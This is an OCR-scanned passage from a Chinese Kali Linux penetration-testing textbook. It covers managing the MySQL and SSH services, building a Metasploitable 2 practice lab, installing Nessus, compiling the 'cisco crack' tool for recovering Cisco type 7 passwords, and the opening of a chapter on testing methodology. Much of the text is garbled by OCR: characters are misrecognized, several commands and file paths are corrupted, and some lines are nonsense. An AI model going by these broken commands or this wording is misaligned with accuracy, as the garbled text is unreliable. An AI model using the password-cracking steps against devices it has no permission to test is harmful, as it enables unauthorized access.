(RDBMS) 。 人 们 通常 会 使 用 Apache 服 务 器 执行 PHP 程 序 ， 并 通过 

PHP 程 序 调用 MySQL; 以 这 种 配置 组 合 来 创建 动态 的 Web 应 用 服务 程 
序 。 束 渗透 测试 的 工作 而 言 ， 您 可 以 把 渗透 测试 的 测试 结果 存储 到 
MySQL 服 务 器 里 。 例 如 ， 可 以 用 MySQL 数 据 保存 漏洞 信息 和 网 络 映射 
的 分 析 结 果 。 当 然 ， 这 需要 您 首先 局 用 这 个 程序 。 

启动 Kali Linux 自 带 的 MySQL 服务 的 操作 步骤 如 下 。 

1. WRENS) MySQL 服务 ， 可 在 桌面 菜单 中 依次 选 
中 Kali Linux | System Service | MySQL | mysql start。 如 果 要 通过 命令 行 
局 动 它 ， 可 在 终端 窗口 里 输入 下 述 指令 : 

service mysql start 

2. 系统 会 返回 下 述 啊 应 信息 。 

[ ok ] Starting MySQL database server: mysqld... .. 








[info] Checking for tables which need an upgrade, are corrupt or were 
not closed cleanly.. 

3. 如 需 测 试 MySQL 的 工作 状态 是 否 正常 ， 可 使 用 MySQL 客 户 端 登 
录 到 服务 器 。 我 们 使 用 用 户 名 Coot) 和 密码 登录 MySQL 服 务 器 。 

mysql —u root -p 

4. 系统 会 返回 下 述 啊 应 信息 。 

Enter password: 

Welcome to the MySQL monitor. Commands end with ; or \g. 

Your MySQL connection id is 42 

Server version: 5.5.30-1 (Debian) 

Copyright (c) 2000, 2013, Oracle and/or its affiliates. All rights 


reserved. 

Oracle is a registered trademark of Oracle Corporation and/or its 
affiliates. Other names may be trademarks of their respective owners. 

Type "help;" or "\h" for help. Type "c" to clear the current input 
statement. 

ipo 

您 可 以 在 MySQL 的 提示 符 下 直接 使 用 SQL 命令 。 如 需 退 出 

"mb 前 程序 ， 请 使 用 quit 命 令 。 

出 于 安全 性 的 考虑 ， 默 认 情 况 下 ， 只 能 从 本 机 访问 Kali Linux 系 统 
里 的 MySQL 服务 。 如 需 调 整 这 个 设置 ， 请 修改 配置 文 
件 /etc/mysqMymy.cnf 里 的 bind-address 语 句 。 除 非 需要 从 其 他 主机 访问 
MySQL 服 务 ， 人 否则 我 们 建议 您 不 要 修改 它 。 

停 上 上 MySQL 服务 的 操作 步骤 如 下 。 

1. 如 果 要 通过 桌面 荣 单 停止 MySQL 服 务 ， 可 在 桌面 荣 单 中 依次 选 
中 Kali Linux | System Service | | mysql stop。 如 果 要 通过 命令 行 
停止 它 ， 可 在 终端 窗口 里 输入 下 述 指令 

service mysql stop 

2. 系统 会 返回 下 述 啊 应 信息 。 

[ ok ] Stopping MySQL database server: mysqld. 

下 述 指令 可 使 Kali Linux 系统 在 司 动 过 程 中 目 动 启动 MySQL 服务 。 

d mysql defaults 

XRO RHUMySQL JI 2r 28158] Ei 2/1/53 SI ET E 


1.7.3 SSH 
SSH 的 全 称 是 Secure Shell。 它 是 目前 较为 可 靠 的 专 为 远程 登录 会 话 
和 其 他 网 络 服务 提供 安全 性 的 协议 。 除 了 远程 登录 的 服务 功能 以 外 ， 它 
还 有 很 多 功能 : 它 支 持 在 主机 间 安 全 地 传递 文件 、 在 远程 主机 上 执行 命 














令 ， 以 及 X11 (Linux 的 桌面 ) 会 话 转发 等 。 

管理 SSH 服 务 的 操作 步骤 如 下 。 

1. 如 果 要 从 桌面 菜单 启动 SSH 服务， 可 在 桌面 菜单 中 依次 选中 
Kali Linux | System Service | SSH | sshd start。 如 果 要 通过 命令 行 启动 
它 ， 可 在 终端 窗口 里 输入 下 述 指令 。 

service ssh start 

2. 系统 会 返回 下 述 啊 应 信息 。 

[ ok ] Starting OpenBSD Secure Shell server: sshd. 

3. 如 需 测 试 SSHD 的 工作 状态 是 否 正常 ， 可 以 在 其 他 主机 上 使 用 
SSH 客 户 端 登 录 到 服务 器 。 如 果 您 使 用 的 是 Microsoft Windows 系统 ， 
可 以 使 用 putty 进行 测试 。 下 载 putty 的 官方 网 站 是 
http://www. chiark.greenend.org.uk/~sgtatham/putty/. 

4. 如 果 要 通过 桌面 菜单 停止 SSHD 服 务 ， 可 在 桌面 菜单 中 依次 选中 
Kali Linux | System Service | SSH | sshd stop。 如 果 要 通过 命令 行 停止 它 ， 
可 在 终端 窗口 里 输入 下 述 指令 。 

service ssh stop 

5. 系统 会 返回 下 述 啊 应 信息 。 

[ ok ] Stopping OpenBSD Secure Shell server: sshd. 

6. 下 述 指令 可 使 Kali Linux 系统 在 启动 过 程 中 自动 启动 SSH 服务 。 

update-rc.d ssh defaults 

这 条 指令 将 把 SSH 服 务 添加 到 自动 启动 的 程序 组 里 。 
































我 们 在 本 节 安 装 渗透 和 测试 的 目标 一 台 存 在 很 多 漏洞 的 虚拟 主 
机 。 本 书 很 多 章节 里 的 特定 主题 都 涉及 这 台 及 弱 系 统 (vulnerable 
server) 。 在 法 律 许可 的 范围 之 内 ， 我 们 不 可 以 攻击 任何 在 Internet 上 的 





存在 漏洞 的 真实 主机 ， 所 以 我 们 必须 使 用 自己 安装 的 脆弱 系统 。 我 们 在 
此 强调 ， 除 非 有 对 方 的 书面 许可 ， 否 则 决 不 可 以 渗透 或 测试 他 人 的 主 
机 。 此 外 ， 我 们 希望 您 能 够 在 自己 搭建 的 环境 中 提高 渗透 技能 。 当 攻击 
没有 达到 预期 成 效 时 ， 只 要 渗透 环境 完全 可 控 ， 您 就 可 以 轻易 地 检查 目 
标 主机 的 情况 ， 从 而 找到 失败 的 原因 。 

在 很 多 国家 ， 只 要 目标 主机 不 是 您 自己 的 ， 哪 怕 您 对 其 进行 端口 扫 
描 都 会 被 认为 是 犯罪 。 而 且 ， 只 要 使 用 虚拟 机 作为 目标 主机 ， 即 使 它 发 
生 了 故障 ， 我 们 也 能 很 快 将 其 修复 。 

我 们 将 在 虚拟 机 里 安装 Metasploitable “2， 用 它 作为 我 们 的 脆弱 系 
统 。Metasploitable 的 研发 团队 是 Rapid7 旗下 车 名 的 HD Moore. 

除了 Metasploitable 2 之 外 ， 还 有 很 多 可 用 于 搭建 渗透 测试 环境 的 脆 
弱 系 统 。 详 情 请 参见 : http://www.felipemartins.info/2011/05/pentesting 
vulnerable-study-frameworks-complete-list/. 

无 论 是 操作 系统 、 网 络 ， 还 是 Web 应 用 服务 方面 ，Metasploitable 2 
都 有 非常 多 的 漏洞 和 问题 。 

有 关 这 些 漏洞 的 详细 情况 ， 请 参见 Rapid 7 的 官方 网 站 : 
https://community.rapid7.com/docs/DOC-1875. 

fr VirtualBox 里 安装 Metasploitable 2 的 操作 步骤 如 下 。 

1. 从 网 络 上 下 载 Metasploitable2 的 虚拟 机 镜像 文件 。 该 网 站 网 址 是 
http://sourceforge. net/projects/metasploitable/files/Metasploitable2/. 

2. 解压 缩 下 载 的 ZIP 文件 。 待 解压 缩 Metasploitable 2 的 ZIP 文 件 之 
后 ， 您 将 看 到 5 个 文件 。 


o Metasploitable.nvram 











o Metasploitable.vmdk 
o Metasploitable.vmsd 
o Metasploitable.vmx 


o Metasploitable.vmxf 


3. 在 VirtualBox 里 创建 一 个 虚拟 机 。 本 例 设置 这 个 虚拟 主机 的 名 
称 (Name) 为 Metasploitable 2， 并 设置 操作 系统 为 Linux 一 Ubuntu。 
4. 给 这 个 虚拟 主机 分 配 1024MB 内 存 。 
5. 在 Virtual Hard Disk 设 置 里 ， 选 择 Use existing hard disk， 然 后 选 
中 我 们 先前 解压 缩 出 来 的 Metasploitable 文 件 〈 见 图 1.33) 。 
< Create New Virtual Machine 


Virtual Hard Disk 


If you wish you can now add a start-up disk to the new machine. You can either 
create a new virtual disk or select one from the list or from another location 
using the folder icon. 


If you need a more complex virtual disk setup you can skip this step and make 
the changes to the machine settings once the machine is created. 


The recommended sie of the start-up disk is 8,00 GB. 
[V] Start-up Disk 
© Create new hard disk 
© Use existing hard disk 


Metasploitable.vmdk (Normal, 8,00 GB) ”| & 





图 1.33 
6. 修改 联网 类 型 为 Host-only adapter， 以 保证 这 人 台 虚 拟 主机 服务 器 
同时 可 被 物理 主机 和 Kali Linux 主机 访问 。 我 们 还 要 修改 Kali Linux 的 
虚拟 主机 ， 把 它 的 联网 类 型 也 改 为 Host-only adapter. 
7. 启动 虚拟 主机 Metasploitable 2。 待 完成 启动 过 程 之 后 ， 您 可 使 
用 下 述 信息 登录 Metasploitable 2 的 终端 。 
o 用 户 名 : msfadmin 


o 密码 : msfadmin 
8. 登录 成 功 之 后 ，Metasploitable 2 的 终端 窗口 如 图 1.34 所 示 。 





图 1.34 











虽然 最 新 版 本 的 Kali Linux 带 有 大 量 的 安全 工具 ， 但 是 由 于 以 下 原 
因 ， 您 可 能 还 会 需要 从 软件 仓库 之 外 安装 程序 : 

e Kali Linux 所 洲 纳 的 版 本 ， 可 能 不 是 该 软件 的 最 新 版 ; 

e Kali Linux 的 软件 仓库 (repository) 可 能 没有 收录 您 所 需要 的 软 
件 。 

我 们 的 建议 是 首先 在 软件 仓库 里 搜索 软件 。 如 果 软 件 仓库 里 有 您 所 
需要 的 软件 ， 就 通过 软件 仓库 安装 该 软件 。 如 果 在 软件 仓库 里 找 不 到 该 
软件 ， 您 可 能 就 不 得 不 从 软件 作者 的 网 站 下 载 并 安装 它 。 

我 们 的 经 验 表 明 ， 您 应 当 尽 量 通过 软件 仓库 安装 软件 。 这 样 一 来 ， 
您 就 不 必 关 注 软件 管理 〈 主 要 是 更 新 ) 的 那些 繁琐 事项 。 

Debian 系 统 有 很 多 可 助 您 管理 软件 包 的 程序 ， 例 如 dpkg、apt 和 











aptitude 程 序 。 按 照 默认 方式 安装 的 Kali Linux 会 带 有 dpkg 和 apt 程序 。 

如 需 了 解 apt 和 dpkg 命 令 的 详细 信息 ， 请 参见 : 
https://help.ubuntu.com/community/A ptGet/Howto/#llhttp://www. 
debian.org/doc/manuals/debian-reference/ch02.en.html 。 

本 节 将 通过 几 个 与 安装 软件 包 有 关 的 实例 来 介绍 apt 命 令 。 

如 需 在 软件 仓库 中 查找 茶 个 软件 包 的 名 称 ， 可 使 用 指令 : 

apt-cache Search < 软件 包 名 称 > 

上 述 指令 将 列 出 含有 “软件 包 名 称 ” 的 全 部 软件 包 。 例 如 ， 我 们 可 以 
使 用 下 述 指令 搜索 一 个 叫做 nessus 的 软件 包 。 

apt-cache search nessus 

如 需 查 看 软件 包 的 详细 信息 《描述 信息 、 软 件 包 大 小 和 版 本 等 信 
轧 ) ， 可 使 用 命令 : 

apt-cache Show < 软件 包 名 称 > 

如 果 决 定安 装 或 更 新 茶 个 软件 ， 那 么 就 可 用 apt-get 命令 安装 该 软 
件 包 。apt-get 指 令 的 基本 用 法 是 : 
apt-get install < 软件 包 名 称 > 
如 果 您 未 能 在 Kali Linux 的 软件 仓库 里 找到 您 所 需要 的 软件 ， 并 且 
能 够 确定 它 日 后 不 会 对 系统 造成 不 展 影响 ， 那 么 您 可 以 手动 安装 软件 





您 
包 

务必 从 可 信 的 软件 源 下 载 软件 ， 尽 量 从 软件 研发 团队 的 网 站 下 载 。 
如 果 研 发 团队 提供 .deb 安 装 包 《后 缀 名 为 .deb 的 文件 是 _ Debian 的 安装 包 
文件 ) ， 您 可 以 使 用 dpkg 命 令 安装 该 软件 包 。 如 果 他 们 没有 提供 .deb 安 
装 包 ， 您 可 以 通过 源 代 码 安 装 访 软件。 虽然 实 际 情况 各 有 不 同 ， 但 是 通 
过 源 代码 安装 软件 的 方法 大 体 都 可 归纳 为 下 述 几 个 步 又 。 

1. 使 用 压缩 包 管 理 软件 (例如 Tar 和 7-Zip〉 解 压缩 软件 包 。 

2. 进入 到 解压 缩 文件 所 在 的 目录 。 

3. 执行 指令 : 





./configure 

make 

make install 

本 节 后 续 的 篇 幅 将 介绍 如 何 安装 没有 被 Kali 软 件 仓库 收录 的 软件 工 
具 。 我 们 将 演示 以 下 两 种 软件 安装 软件 机 制 : 

e 通过 Debian 安装 包 安 装 应 用 程序 ; 

e 通过 源 代 码 安装 应 用 程序 。 








本 小 节 将 通过 第 一 种 安装 机 制 安装 最 新 的 Nessus 漏 洞 扫 描 程 序 《〈 第 
Sh) 。 我 们 在 Kali Linux 的 软件 仓库 进行 过 相关 搜索 ， 并 没有 找到 这 个 
程序 。 

与 上 一 版 本 的 程序 相 比 ， 第 5 版 的 Nessus 的 程序 具有 更 多 功能 。 新 
版 程序 能 够 通过 更 为 详细 的 过 滤 规 则 整理 扫描 结果 ， 创 建 创 建 更 为 灵活 
的 扫描 报告 ， 而 且 简 化 了 扫描 策略 的 设置 过 程 。 因 此 我 们 不 再 使 用 第 4 
版 的 Nessus。 

如 需 了 解 新 版 Nessus 的 改进 之 处 ， 请 参见 : 
http://www.tenable.com/products/ nessus/ nessus-product- overview/why- 
upgrade to-nessus-5. 

我 们 可 以 访问 Nessus 的 官方 网 站 
(http://www.nessus.org/products/nessus/nessus-download- agreement) ， 
并 下 载 其 针对 Debian 6 的 安装 包 。 然 后 ， 通 过 dpkg 指 令 安 装 这 个 软件 
包 : 

dpkg -i Nessus-x.y.z-debian6_i386.deb 

在 这 个 指令 里 ，x.y.z 代表 Nessus 的 版 本 号 。 请 根据 下 载 文件 的 文 
件 名 进行 相应 蔡 换 。 

接 下 来 ， 根 据 Nessus 安 装 程序 在 屏 硕 上 的 提示 进行 相应 配置 。 


1. 您 可 通过 下 述 指令 局 动 Nessus 的 服务 疹 程 序 。 

/etc/init.d/nessusd start 

2. 使 用 浏览 器 访问 网 址 https://localhost:8834。 浏 览 器 会 提示 Nessus 
所 用 的 SSL 证 书 无 效 。 您 需要 检查 SSL 证 书 并 为 这 个 网 站 设置 例外 规 
则 。 处 理 过 SSL 证 书 问题 之 后 ， 您 将 看 到 Nessus 的 页 面 内 容 ， 如 图 1.35 
所 示 。 

3. 上 图 1.35 所 示 的 界面 会 引导 您 设置 Nessus 的 管理 员 账 瑟 。 而 后 ， 
它 要 求 您 输入 Nessus 扫 描 程 序 的 激活 码 。 您 可 在 官方 网 站 





Chttp://www.nessus.org/register/) 进行 注册 ， 从 而 获取 局 动 程序 所 需 的 
激活 码 《〈 见 图 1.36) 。 


E | @ https://localhost:8834/registe 
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Thank you for installing Nessus, the world leader in vulnerability scanners. Nessus will allow you to perform: 


e High-speed vulnerability discovery, to determine which hosts are running which services 

es。 Agentless auditing, to make sure no host on your network is missing security patches 

es Compliance checks, to verify and prove that every host on your network adheres to the security policy you defined 
es Scan scheduling, to automatically run scans at the frequency you select 

e And more! 


During the next steps, we are going to create an administrative account and register your scanner with a Plugin Feed, 
which we will download. You will need an Activation Code before you can use Nessus; if you do not have an Activation 
Code already, please go to http://www.nessus.org/register/ to get one now. 








Get started > 


图 1.35 


localhost. 8834 


or 


Successfully registered the scanner with Tenable. 
Successfully created the user. 


Next: Download plugins > 





图 1.36 
4. 您 只 有 在 成 功 注 册 之 后 才能 下 载 并 使 用 最 新 的 Nessus 组 件 。 下 
载 程序 组 件 的 时 间 会 比较 长 ， 您 可 以 充分 利用 这 个 时 间 做 些 其 他 事情 。 





在 第 二 个 实例 里 ， 我 们 将 安装 一 个 名 为 cisco crack 的 密码 破解 工 
有 具 。 它 主要 用 来 破解 Cisco 配置 文件 中 的 type 7 类 型 密码 。 我 们 可 以 在 
官方 网 站 下 载 它 的 源 代码 ， 该 网 站 网 址 是 http:// 
insecure.org/sploits/cisco.passwords.html. 

Cisco 配置 文件 中 的 type 7 类 型 密码 ， 其 加 和 密 强 度 相 当 弱 ， 所 以 应 
当 避 免 使 用 这 种 类 型 的 密码 。 虽 然 此 类 密码 已 经 很 少见 了 ， 但 是 还 是 有 
些 设备 在 使 用 这 种 密码 。 在 这 种 情况 下 ，Cisco Crack 这 类 工具 将 会 派 得 
上 用 场 。 

下 载 了 源 代 码 之 后 ， 下 一 个 步骤 就 是 编译 源 代码 。 在 开始 编译 它 之 
前 ， 您 需要 在 原文 件 里 添加 两 条 include 语 句 : 











#include <string.h> 

#include <stdlib.h> 

现在 ， 这 个 源 代码 文件 应 该 有 4 条 include 语 句 。 

我 们 使 用 下 述 命令 编译 程序 的 源 代 码 。 

gcc cisco crack.c —o cisco crack 

如 果 编 译 成 功 ， 将 会 产生 一 个 名 为 cisco crack 的 可 执行 文件 。 我 
们 可 以 通过 下 述 指令 得 看 它 的 帮助 信息 。 


# ./cisco crack -h 








Usage: ./cisco. crack -p «encrypted password» 


Jcisco. crack «router config file> «output file> 
1.10 2: 55 


本 章 带 您 步 入 Kali Linux 的 奇妙 世界 。 您 可 以 在 实地 的 渗透 测试 工 
作 中 直接 使 用 其 独到 的 Live DVD 系统 。Kali 的 前 身 是 BackTrack 一 一 一 
个 非常 著名 的 主攻 渗透 测试 的 Linux 发 行 版 。 

本 章 首 先 介 绍 了 Kali Linux 的 简 史 ， 然 后 介绍 了 它 的 主要 功能 。 最 
新 版 本 的 Kali Linux 自 带 有 很 多 可 用 于 渗透 测试 的 软件 工具 。 除 了 渗透 
功能 之 外 ，Kali Linux 还 可 用 于 电子 取证 、 无 线 安 全 研究 、 逆 向 工程 和 
硬件 破解 。 

在 此 基础 上 ， 本 章 介 绍 了 安装 Kali Linux 的 多 种 方法 。 虽 然 无 需 安 
装 Kali Linux 系统 就 可 以 把 它 直 接 当 作 Live DVD 使 用 ， 但 是 我 们 也 可 以 
把 它 安装 到 硬盘 上 ， 甚 至 是 USB 闪存 里 。 当 我 们 把 它 安 装 到 USB 闪存 
的 时 候 ， 它 就 成 为 了 portable Kali Linux. 

在 使 用 Kali Linux 开始 做 渗透 测试 之 前 ， 您 还 需要 设置 好 或 有 线 或 
无 线 的 网 络 连接 。 我 们 还 介绍 了 VirtualBox 虚拟 机 系统 的 一 些 特性 ， 包 
括 安 装 虚拟 机 客户 端 功 能 增强 包 ， 设 置 文件 夹 共享 ， 导 出 虚拟 机 和 快照 























备份 。 

因为 Kali Linux 整合 了 操作 系统 以 外 的 一 些 软 件 ， 所 以 在 必要 的 时 
候 需 要 进行 系统 更 新 。 我 们 可 以 单独 更 新 应 用 程序 ， 也 可 以 连同 Linux 
内 核 一 并 更 新 。 

您 可 能 需要 进行 一 些 渗透 测试 方面 的 练习 。 但 是 在 多 数 国 家 里 ， 未 
经 许可 束 渗 透 他 人 的 服务 器 是 违法 行为 。 为 了 满足 教学 的 需要 ， 人 们 刻 
意 单 独 研 发 出 了 多 种 脆弱 系统 一 一 一 种 售 有 很 多 漏洞 的 虚拟 主机 。 您 5 
以 在 虚拟 机 里 安装 脆弱 系统 ， 以 进行 渗透 测试 的 练习 。 本 文 推荐 的 脆弱 
系统 是 Rapid7 推出 的 Metasploitable 2. 

Kali Linux 系统 自 带 有 多 种 网 络 应 用 服务 ， 我 们 选取 了 HTTP. 
MySQL 和 SSH 进行 介绍 。 有 共 体 来 讲 ， 相 关内 容 都 由 简介 和 管理 服务 
(例如 启动 和 停止 服务 的 方法 ) 的 篇 幅 组 成 。 

在 本 章 的 最 后 ， 我 们 演示 了 安装 Nessus 网 络 扫描 程序 和 Cisco 密 码 破 
解 工 具 的 过 程 ， 介 绍 了 如 何 安装 没有 被 Kali Linux 收录 的 信息 安全 工 
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在 下 一 章 ， 我 们 将 探讨 渗透 测试 的 方法 学 理论 。 





渗透 测试 Cpenetration testing, pentest) 是 实施 安全 评估 〈 即 审 
ip 的 具体 手段 。 方 法 论 是 在 制定 、 实 施 信息 安全 审计 方案 时 ， 需 要 遵 
循 的 规则 、 惯 例 和 过 程 。 人 们 在 评估 网 络 、 应 用 、 系 统 或 三 者 组 合 的 安 
全 状况 时 ， 不 断 措 索 各 种 务实 的 理念 和 成 熟 的 做 法 ， 并 总 绪 出 了 一 和 僚 理 
论 一 一 测试 方法 论 。 本 章 简 要 介绍 了 渗透 测试 方法 论 的 各 关键 要 点 ， 涉 
及 的 主题 包括 : 

e 两 种 广 为 认 知 的 渗透 测试 类 型 一 一 黑 盒 测试 和 白 盒 测试 ; 

e 漏洞 评估 和 渗透 测试 的 区 别 ; 

e ”业界 普 裔 采纳 的 安全 测试 方法 论 ， 以 及 其 核心 功能 、 特 征 和 优 














e 典型 的 渗透 测试 所 涉及 的 10 个 阶段 ; 

e 安全 测试 的 道德 准则 。 

渗透 测试 可 能 是 单独 进行 的 一 项 工作 ， 也 可 能 是 常规 研发 生命 周期 
(例如 ，Microsoft SDLC)〉 里 IT 安全 风险 管理 的 一 个 组 成 部 分 。 产 品 的 
安全 性 并 不 完全 取决 于 IT 方面 的 技术 因素 ， 还 会 受到 与 该 产品 有 关 的 
最 佳 安 全 实践 的 影响 。 具 体 而 言 ， 增 强 产 品 安 全 性 的 工作 涉及 安全 需求 
分 析 、 风 险 分 析 、 威 胁 建 模 、 代 码 审查 和 运营 安全 。 

通常 认为 ， 渗 透 测 试 是 安全 评估 最 终 的 也 是 最 具 侵 犯 性 的 形式 ， 它 
必须 由 符合 资质 的 专业 人 士 实 施 。 在 进行 评 佑 之前， 有 关 人 员 可 能 了 解 
也 可 能 不 了 解 目 标的 具体 情况 。 渗 透 测 斌 可 用 于 评估 所 有 的 开 基 础 设 
施 ， 包 括 应 用 程序 、 网 络 设备 、 操 作 系 统 、 通 信 设 备 、 物 理 安全 和 人 类 
心理 学 。 渗 透 测试 的 工作 成 果 就 是 一 份 渗透 测试 报告 。 这 种 报告 分 为 多 
个 部 分 阐述 在 当前 的 目标 系统 里 找到 的 安全 弱点 ， 并 且 会 讨论 可 行 的 对 











抗 措施 和 其 他 改进 建议 。 充 分 应 用 渗透 测试 方法 论 ， 有 助 于 测试 人 员 在 
活 透 测试 的 各 个 阶段 深入 理解 并 透彻 分 析 当 前 存在 的 防御 措施 。 





虽然 渗透 测试 各 种 各 样 ， 但 是 业内 普遍 将 其 划分 为 两 类 ， 白 盒 测试 
和 黑 盒 测试 。 
2.1.1 黑 盒 测试 


在 进行 黑 盒 测试 时 ， 安 全 审计 员 在 不 清楚 家 被 调 单 位 的 内 部 技术 构 
造 的 情况 下 ， 从 外 部 评估 网 络 基础 设施 的 安全 性 。 在 渗透 测试 的 各 个 阶 
段 ， 黑 盒 测 试 借 助 真实 世界 的 黑客 撤 术 ， 骏 露出 目标 的 安全 问题 ， 甚 全 
可 以 揭露 尚未 被 他 人 利用 的 安全 弱点 。 渗 透 测 试 人 员 应 能 理解 安全 能 
扩 ， 将 之 分 类 并 按照 风险 级 别 ( 高 、 中 、 低 ) 对 其 排序 。 通 常 来 说 ， 风 
险 级 别 取 诀 于 相关 弱点 可 能 形成 的 危害 的 大 小 。 老 练 的 渗透 测试 专家 应 
能 确定 可 引发 安全 事故 的 所 有 攻击 模式 。 当 测试 人 员 完 成 黑 鲍 测试 的 所 
有 测试 工作 之 后 ， 他 们 会 把 与 测试 对 象 安全 状况 有 关 的 必要 信息 进行 整 
理 ， 并 使 用 业务 的 语言 描述 这 些 被 识别 出 来 的 风险 ， 继 而 将 之 汇总 为 书 
面 报告 。 黑 盒 测 试 的 市 场 报价 通常 会 蝇 于 日 盒 测试 。 

2.1.2 H AMA 

盒 测试 的 审计 员 可 以 获取 被 测 单位 的 各 种 内 部 资料 甚至 不 公开 资 
料 ， 所 以 渗透 测试 人 员 的 视野 更 为 开阔 。 大 以 白 盒 测试 的 方法 评估 安全 
漏洞 ， 测 试 人 员 可 以 以 最 小 的 工作 量 达到 最 局 的 评估 精确 度 。 白 盒 测试 
从 被 测 系统 环境 自身 出 友 ， 全 面 消除 内 部 安全 问题 ， 从 而 增加 了 从 单位 
外 部 渗透 系统 的 难度 。 黑 鲍 测 试 起 不 到 这 样 的 作用 。 昌 盒 测 试 所 需 的 步 
又 数目 与 黑 盒 测试 不 相 上 下 。 为 外 ， 奋 能 将 日 盒 测试 与 第 规 的 研发 生命 
周期 相 结合 ， 台 可 以 在 入 侵 者 及 现 甚 至 利用 安全 弱点 之 前 ， 尽 可 能 最 时 

















地 消除 全 部 安全 隐患 。 这 使 得 日 盒 测 试 的 时 间 、 成 本 ， 以 及 发 现 、 解 决 
安全 弱点 的 技术 门槛 都 全 面 低 于 黑 盒 汕 试 。 





正确 地 理解 和 使 用 安全 评估 领域 的 技术 术语 十 分 必要 。 在 您 的 职业 
生涯 中 ， 您 可 能 时 常会 遇 到 那些 不 了 解 行业 术语 ， 却 需要 从 这 些 专 用 名 
词 里 选 一 个 进行 采购 的 人 。 其 实 商业 公司 和 非 商业 机 构 里 大 有 这 样 的 人 
在 。 至 少 您 应 该 明白 这 些 类 型 的 测试 各 是 什么 。 

脆弱 性 评 佑 通过 分 析 企 业 资 产 面临 威胁 的 情况 和 程度 ， 评 佑 内 部 和 
外 部 的 安全 控制 的 安全 性 。 这 种 技术 上 的 信息 系统 评估 ， 不 仅 要 揭露 现 
有 防范 措施 里 存在 的 风险 ， 而 且 要 提出 多 重 备 选 的 补救 策略 ， 并 将 这 些 
策略 进行 比较 。 内 部 的 脆弱 性 评 佑 可 保证 内 部 系统 的 安全 性 ， 而 外 部 的 
脆弱 性 评估 则 用 于 验证 边界 防护 (perimeter defenses) 的 有 效 性 。 无 论 
进行 内 部 脆弱 性 评估 还 是 进行 外 部 脆弱 性 评估 ， 评 估 人 员 都 会 采用 各 种 
攻击 模式 严格 测试 网 络 资产 的 安全 性 ， 从 而 验证 信息 系统 处 理 安 全 威胁 
的 能 力 ， 进 而 确定 应 对 措施 的 有 效 性 。 不 同类 型 的 脆弱 性 评估 需要 的 测 
试 流程 、 测 试 工具 和 自动 化 测试 技术 也 不 相同 。 这 可 以 通过 一 体 化 的 安 
全 弱点 管控 (vulnerability management) 平台 来 实现 。 现 在 的 安全 弱点 
管控 平台 带 有 可 自动 更 新 的 漏洞 数据 库 ， 能 够 测试 不 同类 型 的 网 络 设 
备 ， 而 且 不 会 影响 配置 管理 和 变更 管理 的 完整 性 。 

脆弱 性 评估 和 渗透 测试 两 者 最 大 的 区 别 就 是 : 渗透 测试 不 仅 要 识别 
目标 的 弱点 ， 它 还 涉及 在 目标 系统 上 进行 漏洞 利用 、 权 限 提 升 和 访问 维 
护 。 换 句 话 说， 脆弱 性 评估 虽然 可 以 充分 发 现 系统 里 的 缺陷 ， 但 是 不 会 
考虑 去 衡量 这 些 缺 陷 对 系统 造成 的 危害 。 另 外 ， 相 比 脆 弱 性 评估 ， 渗 透 
测试 更 倾向 于 入 侵 ， 会 刻意 使 用 各 种 技术 手段 利用 安全 漏洞 ;所 以 渗透 
测试 可 能 对 生产 环境 市 来 实际 的 破坏 性 影响 。 而 脆弱 性 评估 则 是 以 非 入 














侵 性 的 方式 ， 定 性 、 定 量 地 识别 已 知 安全 弱点 。 

为 何 需 要 渗透 测试 ? 

如 宁 不 能 确定 防火 场 、IDS、 文 件 完整 性 监控 等 风险 减缓 控制 的 实 
际 效 果 ， 那 么 就 应 当 进 行 渗透 测试 。 虽 然 漏洞 扫描 《脆弱 性 评估 ) 能够 
发 现 各 个 漏洞 ， 但 是 渗透 测试 则 会 验证 这 些 漏洞 在 实际 环境 里 被 利用 的 
可 能 性 。 

有 些 观点 认为 ， 这 两 种 类 型 的 安全 评估 重复 性 很 局， 只 是 同义词 而 
己 。 这 种 观点 绝对 有 误 。 合 格 的 安全 顾问 会 根据 客户 的 商务 需求 ， 选 择 
一 种 最 合适 的 安全 评估 向 顾客 推荐 ， 绝 对 不 会 把 不 同类 型 的 安全 评估 沁 
为 一 谈 。 然 而 ， 仔 细 核 实 安全 评估 项 目的 内 容 和 做 出 最 终 决 定 确实 古 顾 
客 的 贡 任 。 

渗透 测试 的 价格 比 脆 弱 性 评估 的 价格 要 咒 。 

















为 满足 安全 评估 的 相应 需求 ， 人 们 已 经 总 结 出 了 多 种 开源 方法 论 。 
无 论 被 评估 目标 的 规模 有 多 大 ， 复 条 性 有 多 高 ， 只 要 应 用 这 些 安 全 评估 
的 方法 论 ， 束 可 以 策略 性 地 完成 各 种 时 间 要 求 苛刻 、 富 有 挑战 性 的 安全 
评估 任务 。 茶 些 方法 论 专注 于 安全 测试 的 技术 方面 ， 有 些 则 关注 管理 领 
域 。 只 有 极 少数 的 方法 论 能 够 同时 兼顾 技术 因素 和 管理 因素 。 在 评估 工 
作 中 实践 这 些 方法 论 ， 基 本 上 都 是 按部就班 地 执行 各 种 测试 ， 以 精确 地 
判断 被 测试 系统 的 安全 状况 。 

本 书 再 次 问 您 推荐 几 种 著名 的 安全 评 佑 方法论。 本 章 将 重点 突出 这 
些 方法 论 的 关键 特征 和 优势 ， 和 希望 它们 能 够 帮助 您 拓宽 网 络 安 全 和 应 用 
安全 评估 的 视野 。 

e 开源 安全 测试 方法 论 

e 信息 系统 安全 评估 框 染 














e 开放 式 Web 应 用 安全 项 目 

e Web 应 用 安全 联合 威胁 分 类 

e 渗透 测试 执行 标准 

上 述 这 些 测试 框架 和 方法 论 ， 都 能 够 指导 安全 人 士 针 对 客户 需求 制 
定 最 得 当 的 策略 。 其 中 ， 前 两 个 方法 论 所 提供 的 通用 原则 和 方法 ， 几 平 
可 以 指导 面 同 任何 类 型 资产 的 安全 测试 。 由 OWASP (Open Web 
Application Security Project) 推出 的 测试 框架 主要 面向 应 用 安全 的 安全 
评估 。PTES (Penetration Testing Execution Standard) 能够 指导 所 有 类 
型 的 渗透 测试 工作 。 然 而 需要 注意 的 是 ， 安 全 状态 本 上身 是 一 个 持续 变化 
的 过 程 ， 而 渗透 测试 只 能 够 获取 目标 系统 在 被 测试 的 那 一 时 刻 的 安全 状 
态 。 在 测试 的 过 程 中 ， 哪 怕 被 测 的 信息 系统 发 生 了 细微 的 变化 ， 都 可 能 
影响 安全 测试 的 全 局 工作 ， 从 而 导致 最 终 的 测试 结果 不 正确 。 此 外 ， 单 
一 的 测试 方法 论 并 不 一 定 能 够 涵盖 风险 评估 工作 的 所 有 方面 。 而 拟定 适 
